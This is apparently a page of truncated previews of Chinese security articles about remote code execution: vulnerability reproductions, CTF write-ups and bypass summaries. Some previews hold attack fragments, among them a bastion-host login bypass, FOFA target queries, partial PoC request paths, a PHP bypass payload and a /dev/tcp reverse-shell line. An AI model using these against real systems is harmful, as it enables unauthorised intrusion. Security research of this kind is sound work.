RCE 第5页

mysql堡垒机漏洞_绿盟UTS绕过登录/齐治堡垒机 rce

绕过登录随便输密码->修改返回包为True->放行->等待第二次拦截包->内含管理员MD5->替换MD5登录直接请求接口：/webapi/v1/system/accountmanage/account2.齐治堡垒机rce

weixin_39865440·2023-12-16 02:51

DNSLog漏洞探测(五)之XXE漏洞实战

DNSLog漏洞探测(五)之XXE漏洞实战本文我们来学习如何利用DNSLog平台探测目标网站是否存在RCE漏洞，接下来我们还是利用Pikachu的靶场作为演示。

千负·2023-12-15 19:44

DNSLog漏洞探测(七)之SQL注入漏洞实战

DNSLog漏洞探测(七)之SQL注入漏洞实战在前面的文章之中，我们已经学习了XSS、RCE、XXE、SSRF漏洞中有关于DNSLog平台的使用。

千负·2023-12-15 19:38

命令执行RCE及其绕过详细总结（17000＋字数！）

目录操作系统连接符：常见函数：绕过过滤：空格过滤绕过：1、大括号{}：2、$IFS代替空格：3、重定向字符4、%09绕过（相当于Tab键）文件名过滤绕过：1、??,*绕过2、单引号(')双引号("")反引号(``)绕过正则3、反斜杠\绕过4、特殊变量：$1到$9、$@和$*5、内联执行绕过6、利用linux中的环境变量常见文件读取命令绕过：1、base64编码：2、base32编码同理3、HEX编

块块0.o·2023-12-15 11:24

无参数RCE绕过的详细总结（六种方法）

块块0.o·2023-12-15 11:23

红队攻防实战之Redis-RCE集锦

心若有所向往，何惧道阻且长Redis写入SSH公钥实现RCE之前进行端口扫描时发现该机器开着6379，尝试Redis弱口令或未授权访问尝试进行连接Redis，连接成功，存在未授权访问尝试写入SSH公钥设置

各家兴·2023-12-15 09:30

刷题学习记录

知识点：rce+PHP进入环境是一个转化框和运行框既然是rce还有运行框就只用输入命令等待回显就行参考：RCE(命令执行)总结-CSDN博客paylaod：system(‘ls’);system(‘pwd

正在努力中的小白♤·2023-12-15 07:03

[HITCON 2017]SSRFme perl语言的 GET open file 造成rce

这里记录学习一下perl的open缺陷这里首先本地测试一下发现这里使用open打开的时候如果通过管道符就会实现命令执行然后这里注意的是perl中的get调用了open的参数所以其实我们可以通过管道符实现命令执行然后这里如果file可控那么就继续可以实现命令执行这里就是open支持file协议file协议加上|可以将文件名作为shell输出touch'id|'GET'file:id|'类似这种然后我

双层小牛堡·2023-12-15 03:55

Atlassian发布四个CVSS风险评分9.0或更高漏洞，影响多个产品

Bitbucket数据中心版和Server版CVE20221471——SnakeYAML库远程代码执行(RCE)漏洞将影响多个产品Confluence数据中心版和Server版

龙智DevSecOps解决方案·2023-12-15 03:54

[GXYCTF2019]禁止套娃1

提示git泄露无参数rce！！

怪兽不会rap_哥哥我会crash·2023-12-15 00:55

湖农大邀请赛shell_rce漏洞复现

湖农大邀请赛shell_rce复现在2023年湖南农业大学邀请赛的线上初赛中，有一道shell_rce题，本文将复现该题。

妙尽璇机·2023-12-14 15:25

思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现

0x01产品简介思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。0x02漏洞概述由于思福迪运维安全管理系统test_qrcode_b路由存在命令执行漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。0x03复现环境FOFA：((title="Logbase"||header="Server:dummy"||body="onclick=\

OidBoy_G·2023-12-14 14:21

[ISITDTU 2019]EasyPHP 异或RCE count_chars() 限制长度通过构造存在字符获取减小长度

这里有点南啊首先是一个过滤数字和一部分字母的eval肯定是bypass了这里直接取反phpinfo看看是否可行(~%8F%97%8F%96%91%99%90)();成功执行这里我们这里过滤了system等使用prinprint_r(scandir(.))这里()._4个字符是不可能缺少的printrscandir这里发现重复的是rni所以其实我们只需要将其他pts这些看看能不能获取到上面3个即可_

双层小牛堡·2023-12-14 14:59

maxView Storage Manager系统 dynamiccontent.properties.xhtml RCE漏洞复现

0x01产品简介maxViewStorageManager是一款企业存储和通信解决方案的管理系统。0x02漏洞概述maxViewStorageManager系统dynamiccontent.properties.xhtml存在代码执行漏洞，攻击者可通过dynamiccontent.properties.xhtml执行任意代码获取服务器权限。0x03漏洞复现FOFA：title=="maxViewS

OidBoy_G·2023-12-06 20:48

DOCBOX dynamiccontent.properties.xhtml RCE漏洞复现

0x01产品简介DOCBOX是一款具有恢复保证的文档管理系统，高效、快如闪电、防审核、简单，从模拟切换到数字并使用DOCBOX®归档您的文档。0x02漏洞概述DOCBOX电子文档管理系统4.2.0版本中dynamiccontent.properties.xhtml接口存在远程代码执行漏洞，未经身份认证的攻击者可以获取服务器权限。0x03复现环境FOFA：body="docbox.webapp"0x

OidBoy_G·2023-12-06 20:17

Pikachu（三）

RCE(remotecommand/codeexecute)概述RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。

- Time·2023-12-06 17:10

用友NC Cloud FileParserServlet反序列化RCE漏洞复现

0x01产品简介用友NCCloud是一种商业级的企业资源规划云平台，为企业提供全面的管理解决方案，包括财务管理、采购管理、销售管理、人力资源管理等功能，实现企业的数字化转型和业务流程优化。0x02漏洞概述用友NCCloudFileParserServlet接口存在反序列化代码执行漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。0x03复现环境FO

OidBoy_G·2023-12-06 13:59

用友NC JiuQiClientReqDispatch反序列化RCE漏洞复现

0x01产品简介用友NC是一款企业级ERP软件。作为一种信息化管理工具，用友NC提供了一系列业务管理模块，包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等，帮助企业实现数字化转型和高效管理。0x02漏洞概述用友NCJiuQiClientReqDispatch接口存在反序列化代码执行漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器

OidBoy_G·2023-12-06 13:29

【web安全】RCE漏洞原理

RCE漏洞介绍简而言之，就是代码中使用了可以把字符串当做代码执行的函数，但是又没有对用户的输入内容做到充分的过滤，导致可以被远程执行一些命令。

残月只会敲键盘·2023-12-05 08:10

SMBGhost_RCE漏洞（CVE-2020-0796永恒之黑）

https://blog.csdn.net/qq_45372008/article/details/106980409https://zhuanlan.zhihu.com/p/374949632SMB3.1.1协议处理某些请求的方式中存在远程执行代码漏洞，可能被攻击者利用远程执行任意代码。该漏洞的后果十分接近永恒之蓝系列，都利用WindowsSMB漏洞远程攻击获取系统最高权限,故也称永恒之黑。影响

开心星人·2023-12-05 02:35

用友NC FileUploadServlet 反序列化RCE漏洞复现

0x01产品简介用友NC是用友网络科技股份有限公司开发的一款大型企业数字化平台。0x02漏洞概述用友NCnc.file.pub.imple.FileUploadServlet反序列化漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。0x03复现环境FOFA：app="用友-UFIDA-NC"0x04漏洞复现ExpPOST/servlet/~base

OidBoy_G·2023-12-04 22:03

鸿宇多用户商城user.php RCE漏洞复现

0x01产品简介鸿宇多用户商城是一款支持各行业的多商家入驻型电商平台系统,商家版APP,微信商城,小程序及各种主流营销模块应有尽有,是一个功能强大的电子商务平台，旨在为企业和个人提供全面的在线购物解决方案。0x02漏洞概述鸿宇多用户商城user.php存在任意命令执行漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。0x03复现环境FOFA：bod

OidBoy_G·2023-12-04 20:00

DSShop移动商城网店系统反序列化RCE漏洞复现

0x01产品简介DSShop是长沙德尚网络科技有限公司推出的一款单店铺移动商城网店系统，能够帮助企业和个人快速构建手机移动商城,并减少二次开发带来的成本。以其丰富的营销功能，精细化的用户运营，解决电商引流、推广难题，帮助企业打造生态级B2C盈利模式商业平台。完备的电商功能，为企业提升了行业电商品牌的美誉度。系统安全、稳定、快速，便捷的功能扩展及可以进行二次开发的多用户商城源码，为企业电商业务长线快

OidBoy_G·2023-12-04 20:26

百为智能流控路由器 RCE漏洞复现

0x01产品简介BYTEVALUE百为流控路由器是一款追求带宽利用率的多功能路由器。0x02漏洞概述百为智能流控路由器/goform/webRead/open路由的?path参数存在有回显的命令注入漏洞,未经身份认证的攻击者可以利用此漏洞执行任意指令，获取服务器权限。0x03复现环境FOFA：app="BYTEVALUE-智能流控路由器"0x04漏洞复现PoCGET/goform/webRead/

OidBoy_G·2023-12-04 16:03

JetBrains TeamCity RCE漏洞复现(CVE-2023-42793)

0x01产品简介JetBrainsTeamCity是JetBrains公司开发的一款通用CI/CD软件平台。0x02漏洞概述JetBrainsTeamCity可通过访问/app/rest/users/{{id}}/tokens/RPC2端点获取对应id用户的有效token，携带admintoken访问受限端点导致远程命令执行或创建后台管理员用户。0x03影响范围TeamCityOn-Premise

OidBoy_G·2023-12-04 16:03

Tenda 路由器 uploadWewifiPic后台RCE漏洞复现

0x01产品简介腾达路由器是一款高效实用的路由器，致力于为家庭用户提供舒适、便捷、自然的智慧家庭体验。简单便捷的部署在家庭中，彻底解决家庭用户的网络接入问题。0x02漏洞概述腾达路由器后台uploadWewifiPic路由存在命令执行漏洞，攻击者可利用漏洞执行任意命令获取服务器权限。0x03复现环境FOFA：app="Tenda-路由器"0x04漏洞复现默认弱口令登录账号：admin密码：gues

OidBoy_G·2023-12-04 16:27

记录一次vulhub：Jupyter Notebook 未授权访问漏洞复现

一、环境搭建1、在docker容器里搭建环境cdvulhub-master/jupyter/notebook-rce/2、进入目录下，启动环境docker-composeup-d3、查看环境端口dockerps-a

sszsNo1·2023-12-04 14:16

2023SICTF-web-白猫-RCE

0×01分析题目题目名称：RCE题目简介：请bypass我！题目环境：http://210.44.151.51:10088/函数理解：#PHPstr_replace()函数HelloShanghai!

白猫a٩·2023-12-04 00:48

vulhub-CVE-2021-41773

漏洞危害可利用漏洞进行远程RCE，访问web服务器上文档根目录之外的任意文件。泄露CGI。

「已注销」·2023-12-03 14:43

锐捷RG-UAC应用网关前台RCE漏洞复现

0x01产品简介锐捷RG-UAC系列应用管理网关是锐捷自主研发的应用管理产品。0x02漏洞概述锐捷RG-UAC应用管理网关nmc_sync.php接口处存在命令执行漏洞，未经身份认证的攻击者可执行任意命令控制服务器权限。0x03复现环境FOFA：app="Ruijie-RG-UAC"0x04漏洞复现PoCGET/view/systemConfig/management/nmc_sync.php?c

OidBoy_G·2023-12-03 13:11

RCE绕过

1.[SCTF2021]rceme总结下获取disabled_funciton的方式1.phpinfo()2.var_dump(ini_get(“disable_functions”));3.var_dump(get_cfg_var(“disable_functions”));其他的var_dump(get_cfg_var(“open_basedir”));var_dump(ini_get_all

El.十一·2023-12-03 12:19

web:very_easy_sql（sql、ssrf、gopher协议sql注入）

题目页面显示如下显示不是内部用户，无法识别信息查看源码，找到一个use.php访问之后显示如下随便输入了一个，发现url有参数显示试一下靶机的网址，返回nonono联系之前原始页面写的“不是内网用户，无法别识身份”这里没有rce

sleepywin·2023-12-03 09:19

锐捷EWEB网管系统 RCE漏洞复现

0x01产品简介锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件，以“数据时代创新网管与信息安全”为口号，定位于终端安全、IT运营及企业服务化管理统一解决方案。0x02漏洞概述Ruijie-EWEB网管系统flwo.control.php中的type参数存在命令执行漏洞，攻击者可利用该漏洞执行任意命令，写入后门，获取服务器权限，进而控制整个web服务器。0x03复现环境

OidBoy_G·2023-12-03 08:32

中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客

中国蚁剑(AntSword)是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。WebShellWebShell可以理解为网页中的木马程序，通过植入到你的web站点，在web页面上的操作，控制你的计算机操作系统，文件，权限，任意命令执行。常见的WebShell分为大马、小马、一句话木马、内存马等。下面为一句话木马的代码展示：#一句话木马中国蚁剑(An

4ustn1ne·2023-12-03 00:02

上传漏洞（CVE-2022-29464）

该漏洞是一种未经身份验证的无限制任意文件上传，允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE漏洞分析提示存在未授权任意登录，就是不需要登录可以任意上传文件界面显示没有思路搜大神的

securitor·2023-12-03 00:13

无垠的太空第四部 Cibola Burn 第十二章：伯西亚

他制造的炸弹摧毁了RCE航天飞机并杀死了联合国船长。当库普和其他人谋杀RCE安全小组时，他一直在那里。也许从那以后再也没有回来。也许他已经是一个死人了，或者是一个注定要在监狱里生活的人。

yakamoz001·2023-12-02 14:43

命令执行（RCE）与反序列化

命令执行（RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。）

赤赤三·2023-12-02 09:25

Redis主从复制实现RCE

文章目录前置知识概念redismodule利用条件利用工具思路例题[网鼎杯2020玄武组]SSRFMe前置知识概念背景是多台服务器要保存同一份数据，如何实现其一致性呢？数据的读写操作是否每台服务器都可以处理？这里Redis就提供了主从复制的模式来避免此问题主从复制是指将一台Redis主服务器的数据，复制到其他的Redis从服务器。前者称为主节点(master)，后者称为从节点(slave)；主服务

_rev1ve·2023-12-02 04:58

2022UUCTF-web

UUCTFwebsignez_rce--闭合ezsql--输入反向ezrce--6字符RCE方法一方法二ez_unser--引用绕过wakeupez_upload--apache解析漏洞phonecode

yb0os1·2023-12-01 21:27

CTF中字符长度限制下的命令执行 rce(7字符5字符4字符)汇总

七字符rce源码';echoshell_exec($_GET[1]);}else{exit('toolong');}?

OceanSec·2023-12-01 17:53

【Web】UUCTF 2022 新生赛个人复现

目录①websign②ez_rce③ez_upload④ez_unser⑤ezsql⑥ezpop⑦funmd5⑧phonecode⑨ezrce①websign右键打不开，直接抓包发包看源码②ez_rce

Z3r4y·2023-12-01 16:22

Panalog 日志审计系统前台RCE漏洞复现

0x01产品简介Panalog是一款日志审计系统，方便用户统一集中监控、管理在网的海量设备。0x02漏洞概述Panalog日志审计系统sy_query.php接口处存在远程命令执行漏洞，攻击者可执行任意命令，接管服务器权限。0x03复现环境FOFA：app="Panabit-Panalog"0x04漏洞复现PoCPOST/account/sy_query.phpHTTP/1.1Host:your-

OidBoy_G·2023-12-01 11:06

VNCTF(web)小白详解

发现这个就是我们fastjson，rce了。https:/

Dem0@·2023-11-30 22:29

记一次代码审计中RCE挖掘及POC编写

文章转自先知社区：https://xz.aliyun.com/t/13008作者：雨下整夜声明：本文仅限于技术讨论与分享，严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负，与本号及原作者无关。从危险的模板引入开始在前面熟悉代码的过程中，可以注意到此CMS的模板引入方式。以catalog_add.php文件为例，直接采用了include来将htm文件包含，而不是将php文件处理的数据放入

蚁景网络安全·2023-11-30 19:17

红队攻防实战之钉钉RCE

我这一生如履薄冰，你说我能走到对岸吗？本文首发于SecIN社区，原创作者即是本人前言网络安全技术学习，承认⾃⼰的弱点不是丑事。只有对原理了然于⼼，才能突破更多的限制。拥有快速学习能力的白帽子，是不能有短板的，有的只能是大量的标准板和几块长板。知识⾯，决定看到的攻击⾯有多⼴；知识链，决定发动的杀伤链有多深。一、影响版本：经测试需要钉钉版本<6.3.25-Release.2149108二、poc：三、

各家兴·2023-11-30 02:26

【Web】SWPUCTF 2022 新生赛个人复现

目录①webdog1__start②ez_rce③ez_sql④ez_1zpop⑤file_maste⑥Power!

Z3r4y·2023-11-29 11:57

fastjson1.2.47RCE远程命令执行漏洞复现

fastjson1.2.47RCE远程命令执行漏洞复现漏洞背景在2019年6月，fastjson被爆出在fastjson&/dev/tcp/x.x.x.x/port0>&1"};Processpc=rt.exec

zyl404·2023-11-29 03:51

海康运行管理中心 RCE漏洞复现

0x01产品简介海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。海康运行管理中心是一款功能强大、易于使用的安防管理平台，能满足用户对视频监控、报警管理、设备配置和数据统计等方面的需求，帮助用户建立高效、智能的安防系统。0x02漏洞概述海康运行管理中心系统使用低版本的fastjson，攻击者可在未鉴权情况下获取服务器权限，且由于存在相关依赖，即使服务器不出网无法远程加载恶意类也可通过本

OidBoy_G·2023-11-28 22:34

云匣子 FastJson反序列化RCE漏洞复现

0x01产品简介云匣子是租户连接云资源的安全管理工具，帮助云租户更加安全、精细的管理云上的虚拟机、数据库等资源。云安宝结合多年的运维和安全实践，将云上的运维和安全有机结合，实现对运维过程的事前规划、事中控制和事后审计。在此之上，云匣子还完美集成了自动化运维、资产拓扑发现、账号安全等功能0x02漏洞概述云匣子authService接口处使用存在漏洞fastjson组件，未授权的攻击者可通过fastj

OidBoy_G·2023-11-27 06:06

Telesquare TLR-2005Ksh 路由器 RCE漏洞复现

0x01产品简介TelesquareTlr-2005Ksh是韩国Telesquare公司的一款Sk电讯Lte路由器。0x02漏洞概述TelesquareTLR-2005Ksh存在安全漏洞，未经授权的攻击者可通过setSyncTimeHost执行任意命令获取服务器权限。0x03复现环境FOFA：app="TELESQUARE-TLR-2005KSH"0x04漏洞复现PoCGET/cgi-bin/ad

OidBoy_G·2023-11-27 06:03

推荐频道

RCE